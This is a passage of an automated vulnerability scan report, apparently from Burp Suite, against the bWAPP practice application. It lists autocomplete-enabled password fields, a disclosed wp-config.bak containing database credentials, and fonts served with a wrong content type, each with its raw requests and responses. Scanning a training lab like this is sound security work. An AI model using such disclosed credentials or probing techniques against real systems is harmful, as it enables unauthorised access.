    Date: Fri, 09 Mar 2018 02:57:28 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: movie_genre=horror; expires=Fri, 09-Mar-2018 03:57:28 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 13401

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    14. Password field with autocomplete enabled

    There are 8 instances of this issue:

    Issue background

    Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

    The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

    14.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    The form contains the following password field with autocomplete enabled:
    • passphrase

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form>

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="passphrase" name="passphrase" size="20" /></p>
    ...[SNIP]...
    14.2. http://192.168.52.147/bWAPP/http_verb_tampering.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_verb_tampering.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/http_verb_tampering.php
    The form contains the following password fields with autocomplete enabled:
    • password_new
    • password_conf

    Request 1

    GET /bWAPP/http_verb_tampering.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13382

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="/bWAPP/http_verb_tampering.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_new" name="password_new"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.3. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_2.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13259

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    </p>

    <form action="/bWAPP/insecure_crypt_storage_2.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    14.4. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_transp_layer_protect_1.php

    Issue detail

    The page contains a form with the following action URL:
    • https://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/insuff_transp_layer_protect_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13263

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="https://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" /></p>
    ...[SNIP]...
    14.5. http://192.168.52.147/bWAPP/password_change.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/password_change.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/password_change.php
    The form contains the following password fields with autocomplete enabled:
    • password_curr
    • password_new
    • password_conf

    Request 1

    GET /bWAPP/password_change.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:21:08 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13561

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="/bWAPP/password_change.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_curr" name="password_curr"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_new" name="password_new"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.6. http://192.168.52.147/bWAPP/sm_mitm_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sm_mitm_1.php

    Issue detail

    The page contains a form with the following action URL:
    • https://192.168.52.147/bWAPP/sm_mitm_1.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/sm_mitm_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13448

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="https://192.168.52.147/bWAPP/sm_mitm_1.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" /></p>
    ...[SNIP]...
    14.7. http://192.168.52.147/bWAPP/user_extra.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/user_extra.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/user_extra.php
    The form contains the following password fields with autocomplete enabled:
    • password
    • password_conf

    Request 1

    GET /bWAPP/user_extra.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:21:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13910

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/user_extra.php" method="POST">

    <table>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.8. http://192.168.52.147/bWAPP/user_new.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/user_new.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/user_new.php
    The form contains the following password fields with autocomplete enabled:
    • password
    • password_conf

    Request 1

    GET /bWAPP/user_new.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/login.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3417
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/user_new.php" method="POST">

    <table>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    15. Source code disclosure

    Summary

    Severity:   Low
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/wp-config.bak

    Issue detail

    The application appears to disclose some server-side source code written in PHP.

    Issue background

    Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.

    Request 1

    GET /bWAPP/passwords/wp-config.bak HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/passwords/?C=N;O=D
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce016-603-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 1539
    Connection: close
    Content-Type: application/x-trash

    <?php
    // ** MySQL settings ** //
    define('DB_NAME', 'bWAPP'); // The name of the database
    define('DB_USER', 'thor'); // Your MySQL username
    define('DB_PASSWORD', 'Asgard'); // ...and password
    define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');

    // Change each KEY to a different unique phrase. You won't have to remember the phrases later,
    // so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/
    // to get keys generated for you, or just make something up. Each key should have a different phrase.
    define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
    define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
    define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase.

    // You can have multiple installations in one database if you give each a unique prefix
    $table_prefix = 'wp_'; // Only numbers, letters, and underscores please!

    // Change this to localize WordPress. A corresponding MO file for the
    // chosen language must be installed to wp-content/languages.
    // For example, install de.mo to wp-content/languages and set WPLANG to 'de'
    // to enable German language support.
    define ('WPLANG', '');

    /* That's all, stop editing! Happy blogging. */

    if ( !defined('ABSPATH') )
       define('ABSPATH', dirname(__FILE__) . '/');
    require_once(ABSPATH . 'wp-settings.php');
    ?>

    16. Content type incorrectly stated

    There are 8 instances of this issue:

    Issue background

    If a response specifies an incorrect content type then browsers may process the response in unexpected ways. If the content type is specified to be a renderable text-based format, then the browser will usually attempt to interpret the response as being in that format, regardless of the actual contents of the response. Additionally, some other specified content types might sometimes be interpreted as HTML due to quirks in particular browsers. This behavior might lead to otherwise "safe" content such as images being rendered as HTML, enabling cross-site scripting attacks in certain conditions.

    The presence of an incorrect content type statement typically only constitutes a security flaw when the affected resource is dynamically generated, uploaded by a user, or otherwise contains user input. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    16.1. http://192.168.52.147/bWAPP/fonts/arial.ttf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arial.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arial.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce062-bc860-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 772192
    Connection: close
    Content-Type: text/plain

    ............DSIG.7.Y.......|GDEF...I.
    .L....GPOS{V...
    ......GSUB.B`Q...,....JSTFm*i.........LTSHCLc...7...\OS/2.2]s.......`PCLT.{>C.
    .....6VDMXP.j...E$....cmap..WU...`.."^cvt ...........Tfpgm.yY.....
    ...[SNIP]...
    16.2. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbd.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arialbd.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce065-b6cb0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 748720
    Connection: close
    Content-Type: text/plain

    ............DSIG..[...U4...|GDEF...I.
    ......GPOS.....
    ......GSUB..X%..9x....JSTFm*i...U.....LTSH...x..7...\OS/2.]^........`PCLT..AG.
    .....6VDMXV.p..E$....cmap..WU...`.."^cvt .>.....l...Zfpgm...(....
    ...[SNIP]...
    16.3. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbi.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arialbi.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce066-891d0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 561616
    Connection: close
    Content-Type: text/plain

    ...........pDSIGOD.K..zT...|GDEF............GPOS`...........GSUB......n.....LTSH.c....*4..    .OS/2..........`PCLTs.A........6VDMXU4o...40....cmap.`h...5l...Bcvt Tegf..c.....fpgmI.-G..P.....gasp...    ....
    ...[SNIP]...
    16.4. http://192.168.52.147/bWAPP/fonts/ariali.ttf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariali.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/ariali.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce05f-87a44-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 555588
    Connection: close
    Content-Type: text/plain

    ...........pDSIGP//...b....|GDEF............GPOS..,s.......jGSUB......W(....LTSH`TO...*4..    .OS/2..}........`PCLT&.>D.......6VDMXPj...40....cmap.`h...5l...Bcvt =.(7..](...`fpgmT.m6..P.....gasp...    ...|
    ...[SNIP]...
    16.5. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariblk.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/ariblk.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce067-1d444-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 119876
    Connection: close
    Content-Type: text/plain

    ...........PDSIG#o.}........GDEF.&..........GPOS...........,GSUB-.1........bLTSH^w..........OS/2h}........Vcmap).....N....<cvt F.LQ..\....rfpgm.U.E..U....
    gasp...    ........glyf......c.....hdmx.~a2...`
    ...[SNIP]...
    16.6. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/atommicclock.gdf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/atommicclock.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce061-13018-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 77848
    Connection: close
    Content-Type: text/plain

    ^... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    16.7. http://192.168.52.147/bWAPP/fonts/backlash.gdf

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/backlash.gdf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/backlash.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce063-10b40-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 68416
    Connection: close
    Content-Type: text/plain

